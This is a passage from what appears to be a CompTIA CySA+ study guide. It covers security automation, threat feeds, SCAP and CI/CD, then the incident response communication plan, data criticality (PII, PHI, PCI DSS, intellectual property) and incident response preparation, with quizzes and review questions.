EU General Data Protection Regulation (GDPR)
includes provisions that limit
data enrichment. Users typically
have a reasonable idea about which information they
have provided to a specific organization, but if the
organization adds information from other databases, this
picture will be skewed. The organization will have
information about them of which they are not aware.
Figure 14-3 shows another security-related example of
the data enrichment process. This is an example of an
automated process used by a security analytics platform
called Blue Coat. The data enrichment part of the process
occurs at Steps 4 and 5 when information from an
external source is analyzed and used to enrich the alert
message that is generated from the file detected.
Figure 14-3 Data Enrichment Process Example
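As a small programmatic sketch of the same idea (the alert record and asset inventory are hypothetical), enrichment can be as simple as joining an alert against a second data source before an analyst sees it:

# Hypothetical asset inventory used as the enrichment source
ASSET_DB = {
    "10.1.4.7": {"owner": "finance-team", "criticality": "high"},
}

def enrich_alert(alert: dict) -> dict:
    # Merge asset context into the raw alert, returning a new record
    context = ASSET_DB.get(alert["src_ip"],
                           {"owner": "unknown", "criticality": "unknown"})
    return {**alert, **context}

raw = {"src_ip": "10.1.4.7", "signature": "suspicious outbound beacon"}
print(enrich_alert(raw))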
THREAT FEED
COMBINATION
A threat feed is a constantly updating stream of
intelligence about threat indicators and artifacts that is
delivered by a third-party security organization. Threat
feeds are used to inform the organization as quickly as
possible about new threats that have been identified.
Threat feeds contain information including
• Suspicious domains
• Lists of known malware hashes
• IP addresses associated with malicious activity
Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities,” described how a SIEM aggregates
the logs from various security devices into a single log for
analysis. By analyzing the single aggregated log,
inferences can be made about potential issues or attacks
that would not be possible if the logs were analyzed
separately.
Using SIEM (or other aggregation tools) to aggregate
threat feeds can also be beneficial, and tools and services
such as the following offer this type of threat feed
combination:
• Combine: Gathers threat intelligence feeds from
publicly available sources
• Palo Alto Networks AutoFocus: Provides
intelligence, correlation, added context, and
automated prevention workflows
• Anomali ThreatStream: Helps deduplicate
data, removes false positives, and feeds
intelligence to security tools
• ThreatQuotient: Helps accelerate security
operations with an integrated threat library and
shared contextual intelligence
• ThreatConnect: Combines external threat data
from trusted sources with in-house data
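At its simplest, combination means merging and deduplicating indicators across feeds. A toy sketch (both feed files are hypothetical exports, one indicator per line):

def load_indicators(path: str) -> set:
    # Read one indicator (IP address, domain, or hash) per line
    with open(path) as f:
        return {line.strip() for line in f if line.strip()}

feed_a = load_indicators("feed_a.txt")
feed_b = load_indicators("feed_b.txt")

combined = feed_a | feed_b      # union: every unique indicator
corroborated = feed_a & feed_b  # intersection: reported by both feeds
print(f"{len(combined)} unique indicators, {len(corroborated)} corroborated")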
MACHINE LEARNING
Artificial intelligence (AI) and machine learning have
fascinated humans for decades. Artificial intelligence
(AI) is the capability of a computer system to make
decisions using human-like intelligence. Machine
learning is a way to make that possible by creating
algorithms that enable the system to learn from what it observes and apply that learning. Since the first time we conceived of the
idea of talking to a computer and getting an answer like
characters did in comic books years ago, we have waited
for the day to come when smart robots would not just do
the dirty work but also learn just as humans do.
Today, robots are taking on more and more detailed work. One of the exciting areas where AI and machine learning are yielding dividends is in intelligent
network security—or the intelligent network. These
networks seek out their own vulnerabilities before
attackers do, learn from past errors, and work on a
predictive model to prevent attacks.
For example, automatic exploit generation (AEG) is the
“first end-to-end system for fully automatic exploit
generation,” according to Carnegie Mellon University’s own description of its AI named Mayhem. Developed for off-the-shelf as well as enterprise software, including the software increasingly used in smart devices and appliances, AEG can find a bug and determine whether it is exploitable.
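For a small taste of how machine learning is applied to security data, the following Python sketch trains scikit-learn's IsolationForest on a handful of illustrative network flow features and flags an anomalous flow. The feature values are invented for the example, not real traffic.

from sklearn.ensemble import IsolationForest

# Each row: [packets per second, bytes per packet, unique destination ports]
normal_flows = [[120, 800, 3], [95, 750, 2], [110, 820, 4], [100, 790, 3]]
model = IsolationForest(contamination=0.1, random_state=42).fit(normal_flows)

suspect_flow = [[5000, 60, 900]]    # resembles a port scan
print(model.predict(suspect_flow))  # -1 indicates an anomaly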
USE OF AUTOMATION
PROTOCOLS AND
STANDARDS
As in almost every other area of IT, standards and
protocols for automation have emerged to help support
the development and sharing of threat information. As
with all standards, the goal is to arrive at common
methods of sharing threat data.
Security Content Automation
Protocol (SCAP)
Chapter 2, “Utilizing Threat Intelligence to Support
Organizational Security,” introduced the Common
Vulnerability Scoring System (CVSS), a common system
for describing the characteristics of a threat in a standard
format. The ranking of vulnerabilities that are discovered
is based on predefined metrics that also are used by the
Security Content Automation Protocol (SCAP).
This is a standard that the security automation
community uses to enumerate software flaws and
configuration issues. It standardizes the nomenclature and formats used. A vendor of security automation products can obtain a validation against SCAP, demonstrating that its products will interoperate with other scanners and express the scan results in a standardized
way.
Understanding the operation of SCAP requires an
understanding of its identification schemes, one of which, CVE, you have already learned about. Let's review them:
• Common Configuration Enumeration
(CCE): These are configuration best practice
statements maintained by the National Institute
of Standards and Technology (NIST).
• Common Platform Enumeration (CPE):
These are methods for describing and classifying
operating systems, applications, and hardware
devices.
• Common Weakness Enumeration (CWE):
These are design flaws in the development of
software that can lead to vulnerabilities.
• Common Vulnerabilities and Exposures
(CVE): These are vulnerabilities in published
operating systems and applications software.
A good example of the implementation of this is the Microsoft System Center Configuration Manager Extensions for SCAP. This tool allows for the conversion of
SCAP data files to Desired Configuration Management
(DCM) Configuration Packs and converts DCM reports
into SCAP format.
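To illustrate one of these identification schemes, the following Python sketch splits a CPE 2.3 formatted string into its named attributes. This is a simplification that ignores the escaping rules real SCAP tooling must handle.

CPE_FIELDS = ["part", "vendor", "product", "version", "update", "edition",
              "language", "sw_edition", "target_sw", "target_hw", "other"]

def parse_cpe(cpe: str) -> dict:
    """Split a cpe:2.3 formatted string into attribute/value pairs."""
    prefix, cpe_version, *values = cpe.split(":")
    if prefix != "cpe" or cpe_version != "2.3":
        raise ValueError("not a CPE 2.3 formatted string")
    return dict(zip(CPE_FIELDS, values))

print(parse_cpe("cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*"))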
CONTINUOUS INTEGRATION
Continuous integration is a software development
practice whereby the work of multiple individuals is
combined a number of times a day. The idea behind this
is to identify bugs as early as possible in the development
process. As it relates to security, the goal of continuous
integration is to locate security issues as soon as possible.
Continuous integration security testing improves code
integrity, leads to more secure software systems, and
reduces the time it takes to release new updates. Usually,
merging all development versions of the code base occurs
multiple times throughout a day. Figure 14-4 illustrates
this process.
Figure 14-4 Continuous Integration
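A typical continuous integration pipeline also runs security checks on every merge. The following Python sketch shows one way a build script might gate integration on those checks; the stage commands are placeholders for whatever test runner and scanner an organization actually uses.

import subprocess
import sys

STAGES = [
    ["pytest", "tests/"],                            # unit tests (placeholder)
    ["security-scanner", "--fail-on-high", "src/"],  # hypothetical scanner command
]

for stage in STAGES:
    result = subprocess.run(stage)
    if result.returncode != 0:
        print(f"Build failed at stage: {' '.join(stage)}")
        sys.exit(1)  # block the merge when any stage fails

print("All stages passed; changes can be integrated")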
CONTINUOUS
DEPLOYMENT/DELIVERY
Taking continuous integration one step further is the
concept of continuous deployment/delivery. Considered the next generation of DevOps, continuous delivery attempts to ensure that software developers can release new changes to customers quickly and sustainably. Continuous deployment goes one step further still: every change that passes all stages of the production pipeline is released to customers automatically. This helps to improve the
feedback loop. Figure 14-5 illustrates the relationship
between the three concepts.
Figure 14-5 Continuous Integration, Continuous
Delivery, and Continuous Deployment
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 14-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 14-2 Key Topics in Chapter 14
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
workflow orchestration
scripting
application programming interface (API) integration
bash
Node.js
Ruby
Python
Perl
automated malware signature creation
data enrichment
threat feed
machine learning
Security Content Automation Protocol (SCAP)
Common Configuration Enumeration (CCE)
Common Platform Enumeration (CPE)
Common Weakness Enumeration (CWE)
Common Vulnerabilities and Exposures (CVE)
continuous integration
continuous deployment/delivery
REVIEW QUESTIONS
1. _______________ is the sequencing of events
based on certain parameters by using scripting and
scripting tools.
2. List at least one use of workflow orchestration in
the security world.
3. Match the following terms with their definitions.
4. __________________ is a scripting tool found
in Windows servers.
5. List at least two of the components of SCAP.
6. Puppet is a ________________________ tool.
7. List at least two types of information available from
threat feeds.
8. Match the following SCAP terms with their
definitions.
9. _________________________ is a software
development practice whereby the work of multiple individuals is combined a number of times a day.
10. List at least two threat feed aggregation tools.
11. Match the following terms with their definitions.
12. ______________________ are groups of
VMware virtual machines that are managed and
orchestrated as a unit to provide a service to users.
Chapter 15. The Incident
Response Process
This chapter covers the following topics related
to Objective 4.1 (Explain the importance of the
incident response process) of the CompTIA
Cybersecurity Analyst (CySA+) CS0-002
certification exam:
• Communication plan: Describes the proper
incident response processes for communication
during an incident, which includes limiting
communications to trusted parties, disclosing
based on regulatory/legislative requirements,
preventing inadvertent release of information,
using a secure method of communication, and
reporting requirements
• Response coordination with relevant
entities: Describes the entities with which
coordination is required during an incident,
including legal, human resources, public relations,
internal and external, law enforcement, senior
leadership, and regulatory bodies
• Factors contributing to data criticality:
Identifies factors that determine the criticality of
an information resource, which include personally
identifiable information (PII), personal health
information (PHI), sensitive personal information
(SPI), high value asset, financial information,
intellectual property, and corporate information
The incident response process is a formal approach to
responding to security issues. It attempts to avoid the
haphazard approach that can waste time and resources.
This chapter and the next chapter examine this process.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these six self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks.” Table 15-1 lists the major headings
in this chapter and the “Do I Know This Already?” quiz
questions covering the material in those headings so that
you can assess your knowledge of these specific areas.
The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 15-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is false with respect to the
incident response communication plan?
a. Organizations in certain industries may be
required to comply with regulatory or legislative
requirements with regard to communicating
data breaches.
b. Content of these communications should
include as much information as possible.
c. All responders should act to prevent the
disclosure of any information to parties that are
not specified in the communication plan.
d. All communications that take place between
the stakeholders should use a secure
communication process.
2. Which of the following HIPAA rules requires
covered entities and their business associates to
provide notification following a breach of
unsecured PHI?
a. Breach Notification Rule
b. Privacy Rule
c. Security Rule
d. Enforcement Rule
3. Which of the following is responsible for reviewing
NDAs to ensure support for incident response
efforts?
a. Human resources
b. Legal
c. Management
d. Public relations
4. Which of the following is responsible for
developing all written responses to the outside
world concerning an incident and its response?
a. Human resources
b. Legal
c. Management
d. Public relations
5. Which of the following is any piece of data that can
be used alone or with other information to identify
a single person?
a. Intellectual property
b. Trade secret
c. PII
d. PPP
6. Which of the following is not intellectual property?
a. Patent
b. Trade secret
c. Trademark
d. Contract
FOUNDATION TOPICS
COMMUNICATION PLAN
Over time, best practices have evolved for handling the
communication process between stakeholders. By
following these best practices, you have a greater chance
of maintaining control of the process and achieving the
goals of incident response. Failure to follow these
guidelines can lead to lawsuits, the premature alerting of
the suspected party, potential disclosure of sensitive
information, and, ultimately, an incident response
process that is less effective than it could be.
Limiting Communication to Trusted
Parties
During an incident, communications should take place
only with those who have been designated beforehand to
receive such communications. Moreover, the content of
these communications should be limited to what is
necessary for each stakeholder to perform his or her role.
Disclosing Based on
Regulatory/Legislative Requirements
Organizations in certain industries may be required to
comply with regulatory or legislative requirements with
regard to communicating data breaches to affected
parties and to those agencies and legislative bodies
promulgating these regulations. The organization should
include these communication types in the
communication plan.
Preventing Inadvertent Release of
Information
All responders should act to prevent the disclosure of any
information to parties that are not specified in the
communication plan. Moreover, all information released
to the public and the press should be handled by public
relations or persons trained for this type of
communication. The timing of all communications
should also be specified in the plan.
Using a Secure Method of
Communication
All communications that take place between the
stakeholders should use a secure communication process
to ensure that information is not leaked or sniffed.
Secure communication channels and strong
cryptographic mechanisms should be used for these
communications. The best approach is to create an out-of-band method of communication, which does not use
the regular methods of corporate e-mail or VoIP. While
personal cell phones can be a method for voice
communication, file and data exchange should be
through a method that provides end-to-end encryption,
such as Off-the-Record (OTR) Messaging.
Reporting Requirements
Beyond the communication requirements within the
organization, there may be legal obligations to report to
agencies or governmental bodies during and following a
security incident. Especially when sensitive customer,
vendor, or employee records are exposed, organizations
are required to report this in a reasonable time frame.
For example, in the healthcare field, the HIPAA
Breach Notification Rule, 45 CFR §§ 164.400-414,
requires HIPAA covered entities and their business
associates to provide notification following a breach of
unsecured protected health information (PHI). As
another example, all 50 states, the District of Columbia,
Guam, Puerto Rico, and the Virgin Islands have enacted
legislation requiring private or governmental entities to
notify individuals of security breaches of information
involving personally identifiable information (PII). PHI
and PII are described in more detail later in this chapter.
RESPONSE COORDINATION
WITH RELEVANT ENTITIES
During an incident, proper communication among the
various stakeholders in the process is critical to the
success of the response. One key step that helps ensure
proper communication is to select the right people for
the incident response (IR) team. Because these
individuals will be responsible for communicating with
stakeholders, communication skills should be a key
selection criterion for the IR team. Moreover, this team
should take the following steps when selecting
individuals to represent each stakeholder community:
• Select representatives based on communication
skills.
• Hold regular meetings.
• Use proper escalation procedures.
The following sections identify these stakeholders,
discuss why the communication process is important,
describe best practices for the communication process,
and list the responsibilities of various key roles involved
in the response.
Legal
The role of the legal department is to do the following:
• Review nondisclosure agreements (NDAs) to
ensure support for incident response efforts.
• Develop wording of documents used to contact
possibly affected sites and organizations.
• Assess site liability for illegal computer activity.
Human Resources
The role of the HR department involves the following responsibilities in incident response:
• Develop job descriptions for those persons who
will be hired for positions involved in incident
response.
• Create policies and procedures that support the
removal of employees found to be engaging in
improper or illegal activity.
For example, HR should ensure that these activities are
spelled out in policies and new hire documents as
activities that are punishable by firing. This can help
avoid employment disputes when the firing occurs.
Public Relations
The role of public relations is managing the dialog
between the organization and the outside world. One
person should be designated to do all talking to the
media so as to maintain a consistent message.
Responsibilities of the PR department include the
following:
• Handling all press conferences that may be held
• Developing all written responses to the outside
world concerning the incident and its response
Internal and External
Most of the stakeholders will be internal to the
organization but not all. External stakeholders (law
enforcement, industry organizations, and media) should
be managed separately from the internal stakeholders.
Communications to external stakeholders may require a
different and more secure medium.
Law Enforcement
Law enforcement may become involved in many
incidents. Sometimes they are required to become
involved, but in many instances, the organization is likely
to invite law enforcement to get involved. When making
a decision about whether to involve law enforcement,
consider the following factors:
• Law enforcement will view the incident differently
than the company security team views it. While
your team may be more motivated to stop attacks
and their damage, law enforcement may be
inclined to let an attack proceed in order to gather
more evidence.
• The expertise of law enforcement varies. While
contacting local law enforcement may be
indicated for physical theft of computers and
similar incidents, involving law enforcement at
the federal level, where greater skill sets are
available, may be indicated for more abstract
crimes and events. The USA PATRIOT Act
enhanced the investigatory tools available to law
enforcement and expanded their ability to look at
e-mail communications, telephone records,
Internet communications, medical records, and
financial records, which can be helpful.
• Before involving law enforcement, try to rule out
other potential causes of an event, such as
accidents and hardware or software failure.
• In cases where laws have obviously been broken
(child pornography, for example), immediately get
law enforcement involved. This includes any
felonies, regardless of how small the loss to the
company may have been.
Senior Leadership
The most important factor in the success of an incident
response plan is the support, both verbal and financial
(through the budget process), of senior leadership.
Moreover, all other levels of management should fall in
line with support of all efforts. Specifically, senior
leadership’s role involves the following:
• Communicate the importance of the incident
response plan to all parts of the organization.
• Create agreements that detail the authority of the
incident response team to take over business
systems if necessary.
• Create decision systems for determining when key
systems must be removed from the network.
Regulatory Bodies
Earlier in this chapter you learned that there are
reporting requirements to certain governmental bodies
when a data breach occurs. This makes these agencies
external stakeholders. Be aware of reporting
requirements based on the industry in which the
organization operates. An incident response should be
coordinated with any regulatory bodies that regulate the
industry in which the organization operates.
FACTORS CONTRIBUTING
TO DATA CRITICALITY
Sensitivity is a measure of how freely data can be
handled. Some data requires special care and handling,
especially when inappropriate handling could result in
penalties, identity theft, financial loss, invasion of
privacy, or unauthorized access by an individual or many
individuals. Some data is also subject to regulation by
state or federal laws and requires notification in the
event of a disclosure.
Data is assigned a level of sensitivity based on who
should have access to it and how much harm would be
done if it were disclosed. This assignment of sensitivity is
called data classification.
Criticality is a measure of the importance of the data.
Data considered sensitive may not necessarily be
considered critical. Assigning a level of criticality to a
particular data set must take into consideration the
answer to a few questions:
• Will you be able to recover the data in case of
disaster?
• How long will it take to recover the data?
• What is the effect of this downtime, including loss
of public standing?
Data is considered critical when it is essential to the
organization’s business. When essential data is not
available, even for a brief period of time, or its integrity is
questionable, the organization is unable to function.
Data is considered required when it is important to the
organization but organizational operations can continue
for a predetermined period of time even if the data is not
available. Data is considered nonessential if the
organization is able to operate without it during
extended periods of time.
Once the sensitivity and criticality of data are understood
and documented, the organization should work to create
a data classification system. Most organizations use
either a commercial business classification system or a
military and government classification system.
To properly categorize data types, a security analyst
should be familiar with some of the most sensitive types
of data that the organization may possess.
When responding to an incident, the criticality of the data at risk should be a prime consideration when assigning resources to the incident. The more critical the data at risk, the more resources should be assigned to the issue, because it becomes more urgent to identify and correct any settings or policies that are implicated in the incident.
Personally Identifiable Information
(PII)
When considering technology and its use today, privacy
is a major concern of users. This privacy concern usually
involves three areas: which personal information can be
shared with whom, whether messages can be exchanged
confidentially, and whether and how one can send
messages anonymously. Privacy is an integral part of any
security measures that an organization takes.
As part of the security measures that organizations must
take to protect privacy, personally identifiable
information (PII) must be understood, identified, and
protected. PII is any piece of data that can be used alone
or with other information to identify a single person. Any
PII that an organization collects must be protected in the
strongest manner possible. PII includes full name,
identification numbers (including driver’s license
number and Social Security number), date of birth, place
of birth, biometric data, financial account numbers (both
bank account and credit card numbers), and digital
identities (including social media names and tags).
Keep in mind that different countries and levels of
government can have different qualifiers for identifying
PII. Security professionals must ensure that they
understand international, national, state, and local
regulations and laws regarding PII. As the theft of this
data becomes even more prevalent, you can expect more
laws to be enacted that will affect your job. Figure 15-1
shows examples of PII.
Figure 15-1 Personally Identifiable Information
The most obvious reaction to the issue of privacy is the
measures in the far-reaching EU General Data Protection
Regulation (GDPR). The GDPR aims primarily to give
control to individuals over their personal data and to
simplify the regulatory environment for international
business by unifying the regulation within the EU.
Personal Health Information (PHI)
One particular type of PII that an organization might
possess is personal health information (PHI). PHI
includes the medical records of individuals and must be
protected in specific ways, as prescribed by the
regulations contained in the Health Insurance Portability
and Accountability Act of 1996 (HIPAA). HIPAA, also
known as the Kennedy-Kassebaum Act, affects all
healthcare facilities, health insurance companies, and
healthcare clearinghouses. It is enforced by the Office for
Civil Rights (OCR) of the Department of Health and
Human Services (HHS). It provides standards and
procedures for storing, using, and transmitting medical
information and healthcare data. HIPAA overrides state
laws unless the state laws are stricter. Additions to this
law now extend its requirements to third parties that do
work for covered organizations in which those parties
handle this information.
Note
Objective 4.1 of the CySA+ exam refers to PHI as personal health information,
whereas HIPAA refers to it as protected health information.
Sensitive Personal Information (SPI)
Some types of information should receive special
treatment, and certain standards have been designed to
protect this information. This type of data is called
sensitive personal information (SPI). The best
example of this is credit card information. Almost all
companies possess and process credit card data. Holders
of this data must protect it. Many of the highest-profile
security breaches that have occurred have involved the
theft of this data. The Payment Card Industry Data
Security Standard (PCI DSS) affects any
organizations that handle cardholder information for the
major credit card companies. The latest version at the
time of writing is 3.2.1. To prove compliance with the
standard, an organization must be reviewed annually.
Although PCI DSS is not a law, this standard has affected
the adoption of several state laws. PCI DSS specifies 12
requirements, listed in Table 15-2.
Table 15-2 Control Objectives of PCI DSS
High Value Asset
Some assets are not actually information but systems
that provide access to information. When these systems
or groups of systems provide access to data required to
continue to do business, they are called critical systems.
While it is somewhat simpler to arrive at a value for
physical assets such as servers, routers, switches, and
other devices, in cases where these systems provide
access to critical data or are required to continue a
business-critical process, their value is more than the
replacement cost of the hardware. The assigned value
should be increased to reflect its importance in providing
access to data or its role in continuing a critical process.
Financial Information
Financial and accounting data in today’s networks is
typically contained in accounting information systems
(AISs). While these systems offer valuable integration
with other systems, such as HR and customer
relationship management systems, this integration
comes at the cost of creating a secure connection
between these systems. Many organizations are also
abandoning legacy accounting software for cloud-based
vendors to maximize profit. Cloud arrangements bring
their own security issues, such as the danger of data
comingling in the multitenancy environment that is
common in public clouds. Moreover, considering that a
virtual infrastructure underlies these cloud systems, all
the dangers of the virtual environment come into play.
Considering the criticality of this data and the need of
the organization to keep the bulk of it confidential,
incidents that target this type of information or the
systems that provide access to this data should be given
high priority. The following steps should be taken to
protect this information:
• Always ensure physical security of the building.
• Ensure that a firewall is deployed at the perimeter
and make use of all its features, such as URL and
application filtering, intrusion prevention,
antivirus scanning, and remote access via virtual
private networks and TLS/SSL encryption.
• Diligently audit file and folder permissions on all
server resources.
• Encrypt all accounting data.
• Back up all accounting data and store it on servers
that use redundant technologies such as RAID.
Intellectual Property
Intellectual property is a tangible or intangible asset
to which the owner has exclusive rights. Intellectual
property law is a group of laws that recognize exclusive
rights for creations of the mind. The intellectual property
covered by this type of law includes the following:
• Patents
• Trade secrets
• Trademarks
• Copyrights
The following sections explain these types of intellectual
properties and their internal protection.
Patent
A patent is granted to an individual or a company to
protect an invention that is described in the patent’s
application. When the patent is granted, only the patent
owner can make, use, or sell the invention for a period of
time, usually 20 years. Although a patent is considered
one of the strongest intellectual property protections
available, the invention becomes public domain after the
patent expires, thereby allowing any entity to
manufacture and sell the product.
Patent litigation is common in today’s world. You
commonly see technology companies, such as Apple, HP,
and Google, filing lawsuits regarding infringement on
patents (often against each other). For this reason, many
companies involve a legal team in patent research before
developing new technologies. Being the first to be issued
a patent is crucial in today’s highly competitive market.
Any product that is produced and is currently
undergoing the patent application process is usually
identified with the Patent Pending seal, shown in Figure
15-2.
Figure 15-2 Patent Pending Seal
Trade Secret
A trade secret ensures that proprietary technical or
business information remains confidential. A trade
secret gives an organization a competitive edge. Trade
secrets include recipes, formulas, ingredient listings, and
so on that must be protected against disclosure. After a
trade secret is obtained by or disclosed to a competitor or
the general public, it is no longer considered a trade
secret. Most organizations that have trade secrets
attempt to protect them by using nondisclosure
agreements (NDAs). An NDA must be signed by any
entity that has access to information that is part of a
trade secret. Anyone who signs an NDA will suffer legal
consequences if the organization is able to prove that the
signer violated it.
Trademark
A trademark ensures that a symbol, a sound, or an
expression that identifies a product or an organization is
protected from being used by another organization. A
trademark allows a product or an organization to be
recognized by the general public. Most trademarks are
marked with one of the designations shown in Figure 15-3. If a trademark is not registered, an organization
should use a capital TM. If the trademark is registered,
an organization should use a capital R that is encircled.
Figure 15-3 Trademark Designations
Copyright
A copyright ensures that a work that is authored is
protected from any form of reproduction or use without
the consent of the copyright holder, usually the author or
artist who created the original work. A copyright lasts
longer than a patent.
Although the U.S. Copyright Office has several guidelines
to determine the amount of time a copyright lasts, the
general rule for works created after January 1, 1978, is
the life of the author plus 70 years. In 1996, the World
Intellectual Property Organization (WIPO) standardized
the treatment of digital copyrights. Copyright
management information (CMI) is licensing and
ownership information that is added to any digital work.
In this standardization, WIPO stipulated that CMI
included in copyrighted material cannot be altered. The
© symbol denotes a work that is copyrighted.
Securing Intellectual Property
Intellectual property of an organization, including
patents, copyrights, trademarks, and trade secrets, must
be protected, or the business loses any competitive
advantage created by such properties. To ensure that an
organization retains the advantages given by its IP, it
should do the following:
• Invest in well-written NDAs to be included in
employment agreements, licenses, sales contracts,
and technology transfer agreements.
• Ensure that tight security protocols are in place for
all computer systems.
• Protect trade secrets residing in computer systems
with encryption technologies or by limiting
storage to computer systems that do not have
external Internet connections.
• Deploy effective insider threat countermeasures,
particularly focused on disgruntlement detection
and mitigation techniques.
Corporate Information
Corporate confidential data is anything that needs to be
kept confidential within the organization. This can
include the following:
• Plan announcements
• Processes and procedures that may be unique to
the organization
• Profit data and estimates
• Salaries
• Market share figures
• Customer lists
• Performance appraisal
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 15-3 lists a reference of these key topics and the
page numbers on which each is found.
Table 15-3 Key Topics
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
HIPAA Breach Notification Rule
USA PATRIOT Act
sensitivity
criticality
personally identifiable information (PII)
personal health information (PHI)
sensitive personal information (SPI)
Payment Card Industry Data Security Standard (PCI
DSS)
intellectual property
patent
trade secret
trademark
copyright
REVIEW QUESTIONS
1. After a breach, all information released to the public
and the press should be handled by
_________________.
2. List at least one job of the human resources
department with regard to incident response.
3. Match the following terms with their definitions
4. It is the role of ____________________ to
develop job descriptions for those persons who will
be hired for positions involved in incident
response.
5. List at least one of the roles of senior leadership in
incident response.
6. Match the following terms with their definitions.
7. The most important factor in the success of an
incident response plan is the support, both verbal
and financial (through the budget process), of
________________
8. List at least one consideration when assigning a
level of criticality.
9. Match the following terms with their definitions.
10. Salaries of employees is considered
___________________________________
___________
Chapter 16. Applying the
Appropriate Incident
Response Procedure
This chapter covers the following topics related
to Objective 4.2 (Given a scenario, apply the
appropriate incident response procedure) of the
CompTIA Cybersecurity Analyst (CySA+) CS0002 certification exam:
• Preparation: Describes steps required to be
ready for an incident, including training, testing,
and documentation of procedures
• Detection and analysis: Covers detection
methods and analysis, exploring topics such as
characteristics contributing to severity level
classification, downtime, recovery time, data
integrity, economic impact, system process
criticality, reverse engineering, and data
correlation
• Containment: Identifies methods used to
separate and confine the damage, including
segmentation and isolation
• Eradication and recovery: Defines activities
that return the network to normal, including
vulnerability mitigation, sanitization,
reconstruction/reimaging, secure disposal,
patching, restoration of permissions,
reconstitution of resources, restoration of
capabilities and services, and verification of
logging/communication to security monitoring
• Post-incident activities: Identifies operations
that should follow incident recovery, including
evidence retention, lessons learned report, change
control process, incident response plan update,
incident summary report, IoC generation, and
monitoring
When a security incident occurs, there are usually several
possible responses. Choosing the correct response and
appropriately applying that response is a critical part of
the process. This second chapter devoted to the incident
response process presents the many considerations that
go into making the correct decisions regarding response.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these ten self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 16-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 16-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is the first step in the
incident response process?
a. Containment
b. Eradication and recovery
c. Preparation
d. Detection
2. Which of the following groups should receive
technical training on configuring and maintaining
security controls?
a. High-level management
b. Middle management
c. Technical staff
d. Employees
3. Which of the following characteristics of an
incident is a function of how widespread the
incident is?
a. Scope
b. Downtime
c. Data integrity
d. Indicator of compromise
4. Which of the following is the average time required
to repair a single resource or function?
a. RPO
b. MTD
c. MTTR
d. RTO
5. Which of the following processes involves limiting
the scope of an incident by leveraging existing
segments of the network as barriers to prevent the
spread to other segments?
a. Isolation
b. Segmentation
c. Containerization
d. Partitioning
6. How do you isolate a device at Layer 2 without
removing it from the network?
a. Port security
b. Isolation
c. Secured memory
d. Processor encryption
7. Which of the following includes removing data from
the media so that it cannot be reconstructed using
normal file recovery techniques and tools?
a. Destruction
b. Clearing
c. Purging
d. Buffering
8. Which of the following refers to removing all traces
of a threat by overwriting the drive multiple times
to ensure that the threat is removed?
a. Destruction
b. Clearing
c. Purging
d. Sanitization
9. Which of the following refers to behaviors and
activities that precede or accompany a security
incident?
a. IoCs
b. NOCs
c. IONs
d. SOCs
10. Which of the following is the first document that
should be drafted after recovery from an incident?
a. Incident summary report
b. Incident response plan
c. Lessons learned report
d. IoC document
FOUNDATION TOPICS
PREPARATION
When security incidents occur, the quality of the
response is directly related to the amount and the quality
of the preparation. Responders should be well prepared
and equipped with all the tools they need to provide a
robust response. Several key activities must be carried
out to ensure this is the case.
Training
The terms security awareness training, security
training, and security education are often used
interchangeably, but they are actually three different
things. Basically, security awareness training is the what,
security training is the how, and security education is the
why. Security awareness training reinforces the fact that
valuable resources must be protected by implementing
security measures. Security training teaches personnel
the skills they need to perform their jobs in a secure
manner. Organizations often combine security
awareness training and security training and label it as
“security awareness training” for simplicity; the
combined training improves user awareness of security
and ensures that users can be held accountable for their
actions. Security education is more independent,
targeted at security professionals who require security
expertise to act as in-house experts for managing the
security programs.
Security awareness training should be developed based
on the audience. In addition, trainers must understand
the corporate culture and how it will affect security. The
audiences you need to consider when designing training
include high-level management, middle management,
technical personnel, and other staff.
For high-level management, the security awareness
training must provide a clear understanding of potential
risks and threats, effects of security issues on
organizational reputation and financial standing, and
any applicable laws and regulations that pertain to the
organization’s security program. Middle management
training should discuss policies, standards, baselines,
guidelines, and procedures, particularly how these
components map to individual departments. Also,
middle management must understand their
responsibilities regarding security. Technical staff should
receive technical training on configuring and
maintaining security controls, including how to
recognize an attack when it occurs. In addition, technical
staff should be encouraged to pursue industry
certifications and higher education degrees. Other staff
need to understand their responsibilities regarding
security so that they perform their day-to-day tasks in a
secure manner. With these staff, providing real-world
examples to emphasize proper security procedures is
effective.
Personnel should sign a document that indicates they
have completed the training and understand all the
topics. Although the initial training should occur when
personnel are hired, security awareness training should
be considered a continuous process, with future training
sessions occurring at least annually.
Testing
After incident response processes have been developed
as described in Chapter 15, “The Incident Response
Process,” responders should test the process to ensure it
is effective. In Chapter 20, “Applying Security Concepts
in Support of Organizational Risk Mitigation,” you’ll
learn about exercises that can be performed that help to
test your response to a live attack (red team/blue
team/white team exercises and tabletop exercises). The
results of tests along with the feedback from live events
can help to inform the lessons learned report, described
later in this chapter.
Documentation of Procedures
Incident response procedures should be clearly
documented. While many incident response plan
templates can be found online (and even the outline of
this chapter is organized by one set of procedures), a
